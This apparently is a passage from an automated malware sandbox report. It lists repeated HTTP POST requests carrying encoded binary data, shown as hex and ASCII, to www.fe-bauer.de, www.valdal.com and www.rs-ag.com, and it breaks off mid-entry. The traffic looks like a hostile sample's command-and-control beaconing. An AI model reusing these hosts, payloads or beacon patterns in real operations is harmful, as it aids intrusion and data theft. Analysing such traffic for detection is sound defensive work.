a043jUbgbYYu4B1CYTo1vmldwtumU3ko2iCqawjns2JobHZZLQ+j6n2OrRrONdwIXsKvYMDz2UMVt/n13eiIwPFbXLz9jiq3BkTRcVQQ6C+J6ruw8cAPAmT7O19r408ULpd43rX+1nX/qRC5wM8NRzzkTmYmzN75bIniRDnDz7L+EkO/g5cRaI+92h0affaT9QoZG4NLxZk5mXXuBSpe+biWGTin6TgGG+S0nJhLl8qgXBMzfQRYESx5CDmbB4mS2WXOwow2GVFNCf4y9YF4epCU+b7VuufITabmhE3blFUYR5gpq8I47ZFs8ge2LAiYjwSLK4rMjgNe5gRghAD7Uff+4e2he/qYHE0WPixDaLWLhmIq/fdDS2yKRqt8uXp0vezHz4USSBdK5uO2MHR9IzfvhA9RnDIGv9HAiio9sxFG9n18YhtOIj+tsNfDhPo1x7PU83DumeLEAMs69RQ1FckjUPkNkmmwOM7pP/GEFnaRWM6GYtHWbR0CRuGuOMOZyx5x0ndcDpbW020bdFPcXeIHPyXDial8RpSyk7UVVzTp41cBwhHRrBTGXgH8fbu0qAQRJLMZ4lPzYMYpDQDt6gT4bew=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 4b 6c 35 56 4a 62 46 70 70 6f 66 5a 4a 78 32 59 30 4e 64 48 77 41 71 4a 33 36 66 76 44 45 4a 6f 64 55 4e 43 31 79 37 4d 55 53 6e 67 46 71 70 42 5a 5a 32 37 43 69 6e 31 49 64 38 52 2b 31 4c 55 66 45 32 43 43 56 31 4d 30 42 58 42 46 4f 64 50 34 4c 43 76 44 71 69 65 2b 33 31 44 79 39 2b 49 59 49 6e 4e 67 34 32 58 51 4d 37 44 6b 78 71 34 53 55 2f 49 73 37 32 30 43 49 38 73 78 59 70 36 58 4e 6a 2b 49 43 51 49 46 46 47 56 5a 59 4a 32 43 37 68 4b 39 34 31 53 68 50 56 72 58 2b 32 7a 52 77 43 34 44 63 45 4a 59 76 57 57 61 77 76 38 45 49 75 39 58 63 48 53 6b 4a 7a 58 57 55 59 69 71 36 62 41 6c 34 73 7a 37 68 4e 62 32 6a 59 6a 48 67 54 55 4a 46 5a 46 54 54 58 53 41 4d 66 35 52 36 66 6c 67 77 44 5a 49 44 53 39 2f 73 65 74 74 77 37 48 6d 70 67 39 77 56 6d 66 79 42 6c 33 6d 46 71 69 65 38 78 4d 57 54 47 30 42 51 48 4b 58 78 45 55 46 4a 62 73 72 43 41 6d 61 6f 2b 51 6c 63 36 71 42 49 4e 37 67 6f 42 77 63 4b 55 51 42 6d 66 4f 7a 4d 4f 57 2b 5a 7a 4a 33 73 4e 63 43 69 31 53 79 49 70 4d 56 7a 2f 2f 75 50 31 4f 2b 4b 2f 71 48 55 30 65 37 76 59 4f 2f 6a 44 57 7a 68 79 70 54 34 4e 6f 66 7a 49 61 64 31 6e 5a 50 32 58 2f 6f 36 4d 30 32 74 44 78 58 4a 30 52 68 4e 35 44 37 57 77 38 52 43 57 74 51 64 52 64 2b 44 73 56 53 67 78 72 33 32 44 64 37 42 4e 57 45 4f 65 79 4d 47 6b 39 63 4f 36 34 54 36 42 57 6a 30 45 6f 41 42 73 6a 55 6a 46 77 50 68 71 6d 4d 59 6e 42 73 56 46 4f 55 38 50 4a 54 45 50 31 73 48 31 36 66 75 48 68 31 32 65 6c 4f 57 54 52 39 7a 31 4e 52 52 66 6d 50 68 48 63 33 37 51 55 53 6e 2f 31 65 62 75 61 6e 72 44 33 36 37 6a 4d 47 4c 62 6f 63 6c 69 53 31 72 41 4c 6d 49 48 57 4d 69 67 2b 39 75 74 58 51 34 2f 36 73 2f 6f 6e 66 63 6d 4b 61 4b 6b 55 75 32 2b 37 75 58 6e 55 57 6c 4c 61 4b 34 4e 7a 48 76 76 65 70 65 72 6b Data Ascii: Kl5VJbFppofZJx2Y0NdHwAqJ36fvDEJodUNC1y7MUSngFqpBZZ27Cin1Id8R+1LUfE2CCV1M0BXBFOdP4LCvDqie+31Dy9+IYInNg42XQM7Dkxq4SU/Is720CI8sxYp6XNj+ICQIFFGVZYJ2C7hK941ShPVrX+2zRwC4DcEJYvWWawv8EIu9XcHSkJzXWUYiq6bAl4sz7hNb2jYjHgTUJFZFTTXSAMf5R6flgwDZIDS9/settw7Hmpg9wVmfyBl3mFqie8xMWTG0BQHKXxEUFJbsrCAmao+Qlc6qBIN7goBwcKUQBmfOzMOW+ZzJ3sNcCi1SyIpMVz//uP1O+K/qHU0e7vYO/jDWzhypT4NofzIad1nZP2X/o6M02tDxXJ0RhN5D7Ww8RCWtQdRd+DsVSgxr32Dd7BNWEOeyMGk9cO64T6BWj0EoABsjUjFwPhqmMYnBsVFOU8PJTEP1sH16fuHh12elOWTR9z1NRRfmPhHc37QUSn/1ebuanrD367jMGLbocliS1rALmIHWMig+9utXQ4/6s/onfcmKaKkUu2+7uXnUWlLaK4NzHvveperk
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 4b 6c 35 56 4a 62 46 70 70 6f 66 5a 4a 78 32 59 30 4e 64 48 77 41 71 4a 33 36 66 76 44 45 4a 6f 64 55 4e 43 31 79 37 4d 55 53 6e 67 46 71 70 42 5a 5a 32 37 43 69 6e 31 49 64 38 52 2b 31 4c 55 66 45 32 43 43 56 31 4d 30 42 58 42 46 4f 64 50 34 4c 43 76 44 71 69 65 2b 33 31 44 79 39 2b 49 59 49 6e 4e 67 34 32 58 51 4d 37 44 6b 78 71 34 53 55 2f 49 73 37 32 30 43 49 38 73 78 59 70 36 58 4e 6a 2b 49 43 51 49 46 46 47 56 5a 59 4a 32 43 37 68 4b 39 34 31 53 68 50 56 72 58 2b 32 7a 52 77 43 34 44 63 45 4a 59 76 57 57 61 77 76 38 45 49 75 39 58 63 48 53 6b 4a 7a 58 57 55 59 69 71 36 62 41 6c 34 73 7a 37 68 4e 62 32 6a 59 6a 48 67 54 55 4a 46 5a 46 54 54 58 53 41 4d 66 35 52 36 66 6c 67 77 44 5a 49 44 53 39 2f 73 65 74 74 77 37 48 6d 70 67 39 77 56 6d 66 79 42 6c 33 6d 46 71 69 65 38 78 4d 57 54 47 30 42 51 48 4b 58 78 45 55 46 4a 62 73 72 43 41 6d 61 6f 2b 51 6c 63 36 71 42 49 4e 37 67 6f 42 77 63 4b 55 51 42 6d 66 4f 7a 4d 4f 57 2b 5a 7a 4a 33 73 4e 63 43 69 31 53 79 49 70 4d 56 7a 2f 2f 75 50 31 4f 2b 4b 2f 71 48 55 30 65 37 76 59 4f 2f 6a 44 57 7a 68 79 70 54 34 4e 6f 66 7a 49 61 64 31 6e 5a 50 32 58 2f 6f 36 4d 30 32 74 44 78 58 4a 30 52 68 4e 35 44 37 57 77 38 52 43 57 74 51 64 52 64 2b 44 73 56 53 67 78 72 33 32 44 64 37 42 4e 57 45 4f 65 79 4d 47 6b 39 63 4f 36 34 54 36 42 57 6a 30 45 6f 41 42 73 6a 55 6a 46 77 50 68 71 6d 4d 59 6e 42 73 56 46 4f 55 38 50 4a 54 45 50 31 73 48 31 36 66 75 48 68 31 32 65 6c 4f 57 54 52 39 7a 31 4e 52 52 66 6d 50 68 48 63 33 37 51 55 53 6e 2f 31 65 62 75 61 6e 72 44 33 36 37 6a 4d 47 4c 62 6f 63 6c 69 53 31 72 41 4c 6d 49 48 57 4d 69 67 2b 39 75 74 58 51 34 2f 36 73 2f 6f 6e 66 63 6d 4b 61 4b 6b 55 75 32 2b 37 75 58 6e 55 57 6c 4c 61 4b 34 4e 7a 48 76 76 65 70 65 72 6b Data Ascii: Kl5VJbFppofZJx2Y0NdHwAqJ36fvDEJodUNC1y7MUSngFqpBZZ27Cin1Id8R+1LUfE2CCV1M0BXBFOdP4LCvDqie+31Dy9+IYInNg42XQM7Dkxq4SU/Is720CI8sxYp6XNj+ICQIFFGVZYJ2C7hK941ShPVrX+2zRwC4DcEJYvWWawv8EIu9XcHSkJzXWUYiq6bAl4sz7hNb2jYjHgTUJFZFTTXSAMf5R6flgwDZIDS9/settw7Hmpg9wVmfyBl3mFqie8xMWTG0BQHKXxEUFJbsrCAmao+Qlc6qBIN7goBwcKUQBmfOzMOW+ZzJ3sNcCi1SyIpMVz//uP1O+K/qHU0e7vYO/jDWzhypT4NofzIad1nZP2X/o6M02tDxXJ0RhN5D7Ww8RCWtQdRd+DsVSgxr32Dd7BNWEOeyMGk9cO64T6BWj0EoABsjUjFwPhqmMYnBsVFOU8PJTEP1sH16fuHh12elOWTR9z1NRRfmPhHc37QUSn/1ebuanrD367jMGLbocliS1rALmIHWMig+9utXQ4/6s/onfcmKaKkUu2+7uXnUWlLaK4NzHvveperk
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 4b 6c 35 56 4a 62 46 70 70 6f 66 5a 4a 78 32 59 30 4e 64 48 77 41 71 4a 33 36 66 76 44 45 4a 6f 64 55 4e 43 31 79 37 4d 55 53 6e 67 46 71 70 42 5a 5a 32 37 43 69 6e 31 49 64 38 52 2b 31 4c 55 66 45 32 43 43 56 31 4d 30 42 58 42 46 4f 64 50 34 4c 43 76 44 71 69 65 2b 33 31 44 79 39 2b 49 59 49 6e 4e 67 34 32 58 51 4d 37 44 6b 78 71 34 53 55 2f 49 73 37 32 30 43 49 38 73 78 59 70 36 58 4e 6a 2b 49 43 51 49 46 46 47 56 5a 59 4a 32 43 37 68 4b 39 34 31 53 68 50 56 72 58 2b 32 7a 52 77 43 34 44 63 45 4a 59 76 57 57 61 77 76 38 45 49 75 39 58 63 48 53 6b 4a 7a 58 57 55 59 69 71 36 62 41 6c 34 73 7a 37 68 4e 62 32 6a 59 6a 48 67 54 55 4a 46 5a 46 54 54 58 53 41 4d 66 35 52 36 66 6c 67 77 44 5a 49 44 53 39 2f 73 65 74 74 77 37 48 6d 70 67 39 77 56 6d 66 79 42 6c 33 6d 46 71 69 65 38 78 4d 57 54 47 30 42 51 48 4b 58 78 45 55 46 4a 62 73 72 43 41 6d 61 6f 2b 51 6c 63 36 71 42 49 4e 37 67 6f 42 77 63 4b 55 51 42 6d 66 4f 7a 4d 4f 57 2b 5a 7a 4a 33 73 4e 63 43 69 31 53 79 49 70 4d 56 7a 2f 2f 75 50 31 4f 2b 4b 2f 71 48 55 30 65 37 76 59 4f 2f 6a 44 57 7a 68 79 70 54 34 4e 6f 66 7a 49 61 64 31 6e 5a 50 32 58 2f 6f 36 4d 30 32 74 44 78 58 4a 30 52 68 4e 35 44 37 57 77 38 52 43 57 74 51 64 52 64 2b 44 73 56 53 67 78 72 33 32 44 64 37 42 4e 57 45 4f 65 79 4d 47 6b 39 63 4f 36 34 54 36 42 57 6a 30 45 6f 41 42 73 6a 55 6a 46 77 50 68 71 6d 4d 59 6e 42 73 56 46 4f 55 38 50 4a 54 45 50 31 73 48 31 36 66 75 48 68 31 32 65 6c 4f 57 54 52 39 7a 31 4e 52 52 66 6d 50 68 48 63 33 37 51 55 53 6e 2f 31 65 62 75 61 6e 72 44 33 36 37 6a 4d 47 4c 62 6f 63 6c 69 53 31 72 41 4c 6d 49 48 57 4d 69 67 2b 39 75 74 58 51 34 2f 36 73 2f 6f 6e 66 63 6d 4b 61 4b 6b 55 75 32 2b 37 75 58 6e 55 57 6c 4c 61 4b 34 4e 7a 48 76 76 65 70 65 72 6b Data Ascii: Kl5VJbFppofZJx2Y0NdHwAqJ36fvDEJodUNC1y7MUSngFqpBZZ27Cin1Id8R+1LUfE2CCV1M0BXBFOdP4LCvDqie+31Dy9+IYInNg42XQM7Dkxq4SU/Is720CI8sxYp6XNj+ICQIFFGVZYJ2C7hK941ShPVrX+2zRwC4DcEJYvWWawv8EIu9XcHSkJzXWUYiq6bAl4sz7hNb2jYjHgTUJFZFTTXSAMf5R6flgwDZIDS9/settw7Hmpg9wVmfyBl3mFqie8xMWTG0BQHKXxEUFJbsrCAmao+Qlc6qBIN7goBwcKUQBmfOzMOW+ZzJ3sNcCi1SyIpMVz//uP1O+K/qHU0e7vYO/jDWzhypT4NofzIad1nZP2X/o6M02tDxXJ0RhN5D7Ww8RCWtQdRd+DsVSgxr32Dd7BNWEOeyMGk9cO64T6BWj0EoABsjUjFwPhqmMYnBsVFOU8PJTEP1sH16fuHh12elOWTR9z1NRRfmPhHc37QUSn/1ebuanrD367jMGLbocliS1rALmIHWMig+9utXQ4/6s/onfcmKaKkUu2+7uXnUWlLaK4NzHvveperk
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.valdal.comCache-Control: no-cacheData Raw: 70 6f 69 61 71 71 61 39 71 6f 64 6e 4c 62 56 37 51 62 6a 67 72 4d 6b 42 66 35 6d 47 76 4f 73 42 4f 69 78 46 44 52 78 33 34 59 63 33 58 61 44 56 30 64 5a 47 6d 73 74 4e 4a 69 36 46 47 70 61 79 2b 53 51 44 69 72 37 4c 42 44 54 2f 2f 55 56 41 71 56 35 69 4c 44 44 36 4a 56 73 43 74 38 66 4c 48 70 70 63 34 49 49 46 2f 68 76 73 57 61 68 2f 63 69 49 66 32 71 44 6a 6b 4f 52 43 56 41 5a 6c 52 6e 54 7a 54 4c 76 36 78 38 42 52 68 6e 35 4e 64 6c 38 38 66 61 47 43 53 31 63 32 65 4f 6a 6d 4c 59 35 4c 4c 67 44 31 48 57 58 75 77 67 55 53 67 4f 51 6e 75 71 55 54 64 78 30 62 67 43 6c 65 6a 4b 7a 43 34 2f 65 34 50 59 6b 66 4e 41 6c 76 61 70 53 69 44 69 56 48 2b 69 7a 39 31 6d 33 53 75 75 78 4a 36 43 67 48 41 37 67 47 2b 56 72 42 6b 6b 4a 6a 46 6b 4b 46 4c 66 73 61 32 63 75 43 2f 30 41 66 45 62 43 6f 71 59 4d 6d 44 68 34 41 31 61 54 57 4c 52 66 30 75 59 68 37 4d 6e 76 64 37 55 4a 4b 43 41 57 31 4a 65 47 42 35 4b 2b 69 6d 37 32 62 31 6d 74 71 43 5a 4b 56 51 78 76 50 49 59 6a 73 74 6e 5a 48 56 33 73 74 4b 46 47 6d 6a 6a 41 75 77 32 72 65 65 2f 32 42 67 57 4e 72 63 78 52 6b 54 37 68 33 6d 33 2b 55 4b 6d 68 34 30 35 47 6f 54 6a 50 77 77 6f 49 74 72 30 78 65 6f 6e 38 66 61 66 2b 50 65 53 4e 5a 64 4c 4c 54 4e 75 43 44 72 67 64 39 74 39 57 6d 6d 67 37 5a 46 52 7a 78 63 58 76 4b 32 71 49 78 35 50 45 66 69 79 53 66 51 70 46 72 42 56 6b 41 68 51 62 44 54 71 59 47 42 35 7a 63 55 46 66 42 66 64 53 38 59 6a 4f 46 7a 33 55 6e 49 56 62 70 47 46 62 66 36 6c 38 79 44 56 6b 73 6c 52 5a 6d 35 2b 51 2f 2f 51 7a 2b 57 64 53 4f 55 6b 68 39 4b 49 30 39 5a 67 70 31 7a 51 75 56 68 69 37 42 75 32 77 6d 69 6b 43 79 61 31 64 71 73 79 32 4a 36 2f 41 58 44 52 75 49 35 4b 6e 79 69 49 78 44 Data Ascii: poiaqqa9qodnLbV7QbjgrMkBf5mGvOsBOixFDRx34Yc3XaDV0dZGmstNJi6FGpay+SQDir7LBDT//UVAqV5iLDD6JVsCt8fLHppc4IIF/hvsWah/ciIf2qDjkORCVAZlRnTzTLv6x8BRhn5Ndl88faGCS1c2eOjmLY5LLgD1HWXuwgUSgOQnuqUTdx0bgClejKzC4/e4PYkfNAlvapSiDiVH+iz91m3SuuxJ6CgHA7gG+VrBkkJjFkKFLfsa2cuC/0AfEbCoqYMmDh4A1aTWLRf0uYh7Mnvd7UJKCAW1JeGB5K+im72b1mtqCZKVQxvPIYjstnZHV3stKFGmjjAuw2ree/2BgWNrcxRkT7h3m3+UKmh405GoTjPwwoItr0xeon8faf+PeSNZdLLTNuCDrgd9t9Wmmg7ZFRzxcXvK2qIx5PEfiySfQpFrBVkAhQbDTqYGB5zcUFfBfdS8YjOFz3UnIVbpGFbf6l8yDVkslRZm5+Q//Qz+WdSOUkh9KI09Zgp1zQuVhi7Bu2wmikCya1dqsy2J6/AXDRuI5KnyiIxD
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 4b 6c 35 56 4a 62 46 70 70 6f 66 5a 4a 78 32 59 30 4e 64 48 77 41 71 4a 33 36 66 76 44 45 4a 6f 64 55 4e 43 31 79 37 4d 55 53 6e 67 46 71 70 42 5a 5a 32 37 43 69 6e 31 49 64 38 52 2b 31 4c 55 66 45 32 43 43 56 31 4d 30 42 58 42 46 4f 64 50 34 4c 43 76 44 71 69 65 2b 33 31 44 79 39 2b 49 59 49 6e 4e 67 34 32 58 51 4d 37 44 6b 78 71 34 53 55 2f 49 73 37 32 30 43 49 38 73 78 59 70 36 58 4e 6a 2b 49 43 51 49 46 46 47 56 5a 59 4a 32 43 37 68 4b 39 34 31 53 68 50 56 72 58 2b 32 7a 52 77 43 34 44 63 45 4a 59 76 57 57 61 77 76 38 45 49 75 39 58 63 48 53 6b 4a 7a 58 57 55 59 69 71 36 62 41 6c 34 73 7a 37 68 4e 62 32 6a 59 6a 48 67 54 55 4a 46 5a 46 54 54 58 53 41 4d 66 35 52 36 66 6c 67 77 44 5a 49 44 53 39 2f 73 65 74 74 77 37 48 6d 70 67 39 77 56 6d 66 79 42 6c 33 6d 46 71 69 65 38 78 4d 57 54 47 30 42 51 48 4b 58 78 45 55 46 4a 62 73 72 43 41 6d 61 6f 2b 51 6c 63 36 71 42 49 4e 37 67 6f 42 77 63 4b 55 51 42 6d 66 4f 7a 4d 4f 57 2b 5a 7a 4a 33 73 4e 63 43 69 31 53 79 49 70 4d 56 7a 2f 2f 75 50 31 4f 2b 4b 2f 71 48 55 30 65 37 76 59 4f 2f 6a 44 57 7a 68 79 70 54 34 4e 6f 66 7a 49 61 64 31 6e 5a 50 32 58 2f 6f 36 4d 30 32 74 44 78 58 4a 30 52 68 4e 35 44 37 57 77 38 52 43 57 74 51 64 52 64 2b 44 73 56 53 67 78 72 33 32 44 64 37 42 4e 57 45 4f 65 79 4d 47 6b 39 63 4f 36 34 54 36 42 57 6a 30 45 6f 41 42 73 6a 55 6a 46 77 50 68 71 6d 4d 59 6e 42 73 56 46 4f 55 38 50 4a 54 45 50 31 73 48 31 36 66 75 48 68 31 32 65 6c 4f 57 54 52 39 7a 31 4e 52 52 66 6d 50 68 48 63 33 37 51 55 53 6e 2f 31 65 62 75 61 6e 72 44 33 36 37 6a 4d 47 4c 62 6f 63 6c 69 53 31 72 41 4c 6d 49 48 57 4d 69 67 2b 39 75 74 58 51 34 2f 36 73 2f 6f 6e 66 63 6d 4b 61 4b 6b 55 75 32 2b 37 75 58 6e 55 57 6c 4c 61 4b 34 4e 7a 48 76 76 65 70 65 72 6b Data Ascii: Kl5VJbFppofZJx2Y0NdHwAqJ36fvDEJodUNC1y7MUSngFqpBZZ27Cin1Id8R+1LUfE2CCV1M0BXBFOdP4LCvDqie+31Dy9+IYInNg42XQM7Dkxq4SU/Is720CI8sxYp6XNj+ICQIFFGVZYJ2C7hK941ShPVrX+2zRwC4DcEJYvWWawv8EIu9XcHSkJzXWUYiq6bAl4sz7hNb2jYjHgTUJFZFTTXSAMf5R6flgwDZIDS9/settw7Hmpg9wVmfyBl3mFqie8xMWTG0BQHKXxEUFJbsrCAmao+Qlc6qBIN7goBwcKUQBmfOzMOW+ZzJ3sNcCi1SyIpMVz//uP1O+K/qHU0e7vYO/jDWzhypT4NofzIad1nZP2X/o6M02tDxXJ0RhN5D7Ww8RCWtQdRd+DsVSgxr32Dd7BNWEOeyMGk9cO64T6BWj0EoABsjUjFwPhqmMYnBsVFOU8PJTEP1sH16fuHh12elOWTR9z1NRRfmPhHc37QUSn/1ebuanrD367jMGLbocliS1rALmIHWMig+9utXQ4/6s/onfcmKaKkUu2+7uXnUWlLaK4NzHvveperk
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.valdal.comCache-Control: no-cacheData Raw: 70 6f 69 61 71 71 61 39 71 6f 64 6e 4c 62 56 37 51 62 6a 67 72 4d 6b 42 66 35 6d 47 76 4f 73 42 4f 69 78 46 44 52 78 33 34 59 63 33 58 61 44 56 30 64 5a 47 6d 73 74 4e 4a 69 36 46 47 70 61 79 2b 53 51 44 69 72 37 4c 42 44 54 2f 2f 55 56 41 71 56 35 69 4c 44 44 36 4a 56 73 43 74 38 66 4c 48 70 70 63 34 49 49 46 2f 68 76 73 57 61 68 2f 63 69 49 66 32 71 44 6a 6b 4f 52 43 56 41 5a 6c 52 6e 54 7a 54 4c 76 36 78 38 42 52 68 6e 35 4e 64 6c 38 38 66 61 47 43 53 31 63 32 65 4f 6a 6d 4c 59 35 4c 4c 67 44 31 48 57 58 75 77 67 55 53 67 4f 51 6e 75 71 55 54 64 78 30 62 67 43 6c 65 6a 4b 7a 43 34 2f 65 34 50 59 6b 66 4e 41 6c 76 61 70 53 69 44 69 56 48 2b 69 7a 39 31 6d 33 53 75 75 78 4a 36 43 67 48 41 37 67 47 2b 56 72 42 6b 6b 4a 6a 46 6b 4b 46 4c 66 73 61 32 63 75 43 2f 30 41 66 45 62 43 6f 71 59 4d 6d 44 68 34 41 31 61 54 57 4c 52 66 30 75 59 68 37 4d 6e 76 64 37 55 4a 4b 43 41 57 31 4a 65 47 42 35 4b 2b 69 6d 37 32 62 31 6d 74 71 43 5a 4b 56 51 78 76 50 49 59 6a 73 74 6e 5a 48 56 33 73 74 4b 46 47 6d 6a 6a 41 75 77 32 72 65 65 2f 32 42 67 57 4e 72 63 78 52 6b 54 37 68 33 6d 33 2b 55 4b 6d 68 34 30 35 47 6f 54 6a 50 77 77 6f 49 74 72 30 78 65 6f 6e 38 66 61 66 2b 50 65 53 4e 5a 64 4c 4c 54 4e 75 43 44 72 67 64 39 74 39 57 6d 6d 67 37 5a 46 52 7a 78 63 58 76 4b 32 71 49 78 35 50 45 66 69 79 53 66 51 70 46 72 42 56 6b 41 68 51 62 44 54 71 59 47 42 35 7a 63 55 46 66 42 66 64 53 38 59 6a 4f 46 7a 33 55 6e 49 56 62 70 47 46 62 66 36 6c 38 79 44 56 6b 73 6c 52 5a 6d 35 2b 51 2f 2f 51 7a 2b 57 64 53 4f 55 6b 68 39 4b 49 30 39 5a 67 70 31 7a 51 75 56 68 69 37 42 75 32 77 6d 69 6b 43 79 61 31 64 71 73 79 32 4a 36 2f 41 58 44 52 75 49 35 4b 6e 79 69 49 78 44 Data Ascii: poiaqqa9qodnLbV7QbjgrMkBf5mGvOsBOixFDRx34Yc3XaDV0dZGmstNJi6FGpay+SQDir7LBDT//UVAqV5iLDD6JVsCt8fLHppc4IIF/hvsWah/ciIf2qDjkORCVAZlRnTzTLv6x8BRhn5Ndl88faGCS1c2eOjmLY5LLgD1HWXuwgUSgOQnuqUTdx0bgClejKzC4/e4PYkfNAlvapSiDiVH+iz91m3SuuxJ6CgHA7gG+VrBkkJjFkKFLfsa2cuC/0AfEbCoqYMmDh4A1aTWLRf0uYh7Mnvd7UJKCAW1JeGB5K+im72b1mtqCZKVQxvPIYjstnZHV3stKFGmjjAuw2ree/2BgWNrcxRkT7h3m3+UKmh405GoTjPwwoItr0xeon8faf+PeSNZdLLTNuCDrgd9t9Wmmg7ZFRzxcXvK2qIx5PEfiySfQpFrBVkAhQbDTqYGB5zcUFfBfdS8YjOFz3UnIVbpGFbf6l8yDVkslRZm5+Q//Qz+WdSOUkh9KI09Zgp1zQuVhi7Bu2wmikCya1dqsy2J6/AXDRuI5KnyiIxD
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 4b 6c 35 56 4a 62 46 70 70 6f 66 5a 4a 78 32 59 30 4e 64 48 77 41 71 4a 33 36 66 76 44 45 4a 6f 64 55 4e 43 31 79 37 4d 55 53 6e 67 46 71 70 42 5a 5a 32 37 43 69 6e 31 49 64 38 52 2b 31 4c 55 66 45 32 43 43 56 31 4d 30 42 58 42 46 4f 64 50 34 4c 43 76 44 71 69 65 2b 33 31 44 79 39 2b 49 59 49 6e 4e 67 34 32 58 51 4d 37 44 6b 78 71 34 53 55 2f 49 73 37 32 30 43 49 38 73 78 59 70 36 58 4e 6a 2b 49 43 51 49 46 46 47 56 5a 59 4a 32 43 37 68 4b 39 34 31 53 68 50 56 72 58 2b 32 7a 52 77 43 34 44 63 45 4a 59 76 57 57 61 77 76 38 45 49 75 39 58 63 48 53 6b 4a 7a 58 57 55 59 69 71 36 62 41 6c 34 73 7a 37 68 4e 62 32 6a 59 6a 48 67 54 55 4a 46 5a 46 54 54 58 53 41 4d 66 35 52 36 66 6c 67 77 44 5a 49 44 53 39 2f 73 65 74 74 77 37 48 6d 70 67 39 77 56 6d 66 79 42 6c 33 6d 46 71 69 65 38 78 4d 57 54 47 30 42 51 48 4b 58 78 45 55 46 4a 62 73 72 43 41 6d 61 6f 2b 51 6c 63 36 71 42 49 4e 37 67 6f 42 77 63 4b 55 51 42 6d 66 4f 7a 4d 4f 57 2b 5a 7a 4a 33 73 4e 63 43 69 31 53 79 49 70 4d 56 7a 2f 2f 75 50 31 4f 2b 4b 2f 71 48 55 30 65 37 76 59 4f 2f 6a 44 57 7a 68 79 70 54 34 4e 6f 66 7a 49 61 64 31 6e 5a 50 32 58 2f 6f 36 4d 30 32 74 44 78 58 4a 30 52 68 4e 35 44 37 57 77 38 52 43 57 74 51 64 52 64 2b 44 73 56 53 67 78 72 33 32 44 64 37 42 4e 57 45 4f 65 79 4d 47 6b 39 63 4f 36 34 54 36 42 57 6a 30 45 6f 41 42 73 6a 55 6a 46 77 50 68 71 6d 4d 59 6e 42 73 56 46 4f 55 38 50 4a 54 45 50 31 73 48 31 36 66 75 48 68 31 32 65 6c 4f 57 54 52 39 7a 31 4e 52 52 66 6d 50 68 48 63 33 37 51 55 53 6e 2f 31 65 62 75 61 6e 72 44 33 36 37 6a 4d 47 4c 62 6f 63 6c 69 53 31 72 41 4c 6d 49 48 57 4d 69 67 2b 39 75 74 58 51 34 2f 36 73 2f 6f 6e 66 63 6d 4b 61 4b 6b 55 75 32 2b 37 75 58 6e 55 57 6c 4c 61 4b 34 4e 7a 48 76 76 65 70 65 72 6b Data Ascii: Kl5VJbFppofZJx2Y0NdHwAqJ36fvDEJodUNC1y7MUSngFqpBZZ27Cin1Id8R+1LUfE2CCV1M0BXBFOdP4LCvDqie+31Dy9+IYInNg42XQM7Dkxq4SU/Is720CI8sxYp6XNj+ICQIFFGVZYJ2C7hK941ShPVrX+2zRwC4DcEJYvWWawv8EIu9XcHSkJzXWUYiq6bAl4sz7hNb2jYjHgTUJFZFTTXSAMf5R6flgwDZIDS9/settw7Hmpg9wVmfyBl3mFqie8xMWTG0BQHKXxEUFJbsrCAmao+Qlc6qBIN7goBwcKUQBmfOzMOW+ZzJ3sNcCi1SyIpMVz//uP1O+K/qHU0e7vYO/jDWzhypT4NofzIad1nZP2X/o6M02tDxXJ0RhN5D7Ww8RCWtQdRd+DsVSgxr32Dd7BNWEOeyMGk9cO64T6BWj0EoABsjUjFwPhqmMYnBsVFOU8PJTEP1sH16fuHh12elOWTR9z1NRRfmPhHc37QUSn/1ebuanrD367jMGLbocliS1rALmIHWMig+9utXQ4/6s/onfcmKaKkUu2+7uXnUWlLaK4NzHvveperk
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.rs-ag.comCache-Control: no-cacheData Raw: 65 53 61 4d 4f 57 6b 5a 68 49 5a 35 76 6b 49 6d 4f 42 4f 46 4c 6f 4b 70 6e 6f 73 48 73 35 35 4c 72 64 4a 61 77 70 46 47 30 4a 66 55 37 6d 62 70 63 43 4a 6a 54 62 79 49 6d 31 63 6c 6f 2f 44 42 4f 52 4a 63 6c 74 62 41 52 4c 48 4f 65 78 68 43 4a 37 63 76 53 62 35 37 6d 30 6b 53 4c 64 4c 41 6c 53 43 45 46 55 6f 44 32 32 54 51 78 71 39 4b 33 4e 4d 76 31 4f 70 4f 62 45 77 56 55 44 63 4f 51 62 67 59 52 75 43 4c 47 35 4d 64 51 4a 35 58 73 37 4f 46 70 36 78 76 43 45 34 4e 45 43 46 41 69 46 6f 7a 4e 49 36 68 4c 41 64 41 66 51 79 64 46 45 33 62 55 69 46 52 2b 66 41 61 4f 46 6c 44 70 52 6c 36 37 38 78 79 38 39 47 6a 61 4d 64 64 61 73 47 77 46 45 41 6f 59 